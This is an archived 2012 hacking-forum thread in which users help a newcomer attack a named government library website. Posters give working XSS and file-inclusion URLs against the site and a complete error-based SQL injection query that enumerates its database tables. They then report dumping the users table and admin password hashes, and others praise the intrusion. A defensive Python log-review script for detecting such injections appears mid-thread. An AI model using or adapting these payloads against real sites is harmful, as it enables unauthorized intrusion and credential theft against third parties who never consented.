SQLi help needed :'(

Postby NIIGHT HAWKE » Tue Jun 19, 2012 2:21 pm

Sir(s), I'm so sorry for making a thread asking for help :'( I've found an SQL vulnerability with this site:
Code:
http://www.nlm.gov.mm/index.php?catid=1%27&id=88%3Adigitalization-project&Itemid=50&lang=mm&option=com_content&view=article
but I can't inject :'( Would you please tell me the reason, sir(s) :(
NIIGHT HAWKE
n00b
 
Posts: 13
Joined: Tue Jun 19, 2012 2:06 pm

Re: SQLi help needed :'(

Postby Cool_Fire » Tue Jun 19, 2012 6:20 pm

It does look like it'll be SQL injectable. I'll admit I'm not great with that though. It's also vulnerable to XSS and LFI btw.

XSS:
Code:
http://www.nlm.gov.mm/index.php?catid=<script>alert(String.fromCharCode(88,83,83));</script> 1--&id=88:digitalization-project&Itemid=50&lang=mm&option=com_content&view=article

(Doesn't work in Chrome 19, does in FF 13)

LFI:
Code:
http://www.nlm.gov.mm/index.php?catid=%3Ciframe%20src=index.php%3E%3C/iframe%3E%201--&id=88:digitalization-project&Itemid=50&lang=mm&option=com_content&view=article
Last edited by Cool_Fire on Tue Jun 19, 2012 6:59 pm, edited 2 times in total.
Reason: Added example URLs
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!

Hackerthreads chat, where the party is going 24/7.
Cool_Fire
Not a sandwich
 
Posts: 1558
Joined: Fri May 09, 2003 1:20 pm
Location: 41 6d 73 74 65 72 64 61 6d

Re: SQLi help needed :'(

Postby NIIGHT HAWKE » Wed Jun 20, 2012 12:21 am

Thank you sir :) Would you please tell me, sir, how I can inject on that site, sir :(

Re: SQLi help needed :'(

Postby Cool_Fire » Wed Jun 20, 2012 12:50 am

I'm not sure. If I had come across a way that works, I'd have posted it along with the LFI and XSS examples.

Re: SQLi help needed :'(

Postby NIIGHT HAWKE » Wed Jun 20, 2012 12:57 am

Thank you sir :) Sir, is there any way to obtain the username on blind SQL, a shortcut, sir?

Re: SQLi help needed :'(

Postby NIIGHT HAWKE » Wed Jun 20, 2012 1:02 am

Sir :( I don't know how to obtain table names in version 4, sir :'(

Re: SQLi help needed :'(

Postby Cool_Fire » Wed Jun 20, 2012 1:11 am

Blind SQL injection is always difficult. If you want to get table names, you need to inject a 'SHOW TABLES' statement and you need to get the output from this statement somehow.

Re: SQLi help needed :'(

Postby NIIGHT HAWKE » Wed Jun 20, 2012 1:16 am

Sir, would you please show me the query? Please, sir :(

Re: SQLi help needed :'(

Postby Cool_Fire » Wed Jun 20, 2012 1:23 am

Perhaps I've not made this sufficiently clear before: I do not know.
Cool_Fire wrote:It does look like it'll be SQL injectable. I'll admit I'm not great with that though.

Re: SQLi help needed :'(

Postby NIIGHT HAWKE » Wed Jun 20, 2012 1:56 am

Sorry sir :'( I'm asking for the query that can obtain tables in the SQL website's version 4, sir :'(

Re: SQLi help needed :'(

Postby Cool_Fire » Wed Jun 20, 2012 2:08 am

And I'm telling you I don't know. The SQL query to show tables is just SHOW TABLES. But I do not know how you get that website to execute it and show you the result.

Cool_Fire wrote:If you want to get table names, you need to inject a 'SHOW TABLES' statement

Re: SQLi help needed :'(

Postby NIIGHT HAWKE » Wed Jun 20, 2012 1:33 pm

Thanks for helping me, sir :)

Re: SQLi help needed :'(

Postby w0rd » Thu Jul 05, 2012 10:54 am

The site IS vulnerable to SQL injection, but it's error based and pretty advanced.

For example, here's the query to get the first table:

Code:
http://www.nlm.gov.mm/index.php?id=88:Adigitalization-project&Itemid=50&lang=mm&option=com_content&view=article&catid=1 and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,table_name,0x27,0x7e) from `information_schema`.tables where table_schema=0x3434343038365F6E6C6D limit 0,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1


In the SQL Error you'll see that it shows the table "jos_banner"

You can continue to enumerate them, but I'd recommend an automated program because this could take some time.

::EDIT::

I went ahead and retrieved the contents of jos_users - unfortunately the table is empty so there's not much to find there. =/
w0rd
n00b
 
Posts: 3
Joined: Thu Dec 03, 2009 4:17 am
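
The post above depends on catid reaching the SQL string unvalidated and on the database error being echoed to the client. As an added example (not part of the original thread), here is a log-review check that flags requests whose integer parameters carry non-numeric content or fragments of that error-based technique; the log lines, the parameter list and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the thread's URLs show as plain integers (illustrative list,
# an assumption of this example). "id" is left out: it carries a slug.
NUMERIC_PARAMS = {"catid", "Itemid"}

# Fragments of the duplicate-key error technique quoted in the thread.
ERROR_BASED = re.compile(
    r"information_schema|floor\s*\(\s*rand\s*\(|concat\s*\(\s*0x", re.IGNORECASE)

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed access-log lines (addresses are documentation placeholders).
SAMPLE_LOG = [
    '198.51.100.7 "GET /index.php?catid=1&id=88&Itemid=50&view=article HTTP/1.1" 200',
    '198.51.100.9 "GET /index.php?catid=1%27&id=88&Itemid=50&view=article HTTP/1.1" 500',
    '198.51.100.9 "GET /index.php?id=88&Itemid=50&catid=1%20and(select%201%20from'
    '(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20'
    'information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500',
]

def classify(line):
    """Return (status, findings) for one log line."""
    m = REQUEST.search(line)
    if not m:
        return None, []
    url, status = m.group(1), int(m.group(2))
    findings = []
    # parse_qsl percent-decodes values, so %27 and %20 are seen as ' and space.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not value.isdigit():
            findings.append(f"{name}: non-numeric value")
        if ERROR_BASED.search(value):
            findings.append(f"{name}: error-based SQLi marker")
    return status, findings

def review(lines):
    """Return (status, error_returned, findings) for every flagged line.
    A 500 next to a finding suggests the database error reached the client."""
    report = []
    for line in lines:
        status, findings = classify(line)
        if findings:
            report.append((status, status == 500, findings))
    return report

if __name__ == "__main__":
    for entry in review(SAMPLE_LOG):
        print(entry)
```

On the application side the durable fix is to cast such parameters to integers or bind them as query parameters, and to stop rendering database errors in the response.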

Re: SQLi help needed :'(

Postby Cool_Fire » Fri Jul 06, 2012 6:06 am

Nicely done.

Re: SQLi help needed :'(

Postby wombraider » Mon Jul 16, 2012 12:42 pm

hey ... got you the admin and some sort of weird pw stuff... won't edit the dump since I'm confused about the 3rd set of hash.

pm me if you want tablestructure :)

wombraider
n00b
 
Posts: 1
Joined: Mon Jul 16, 2012 12:33 pm
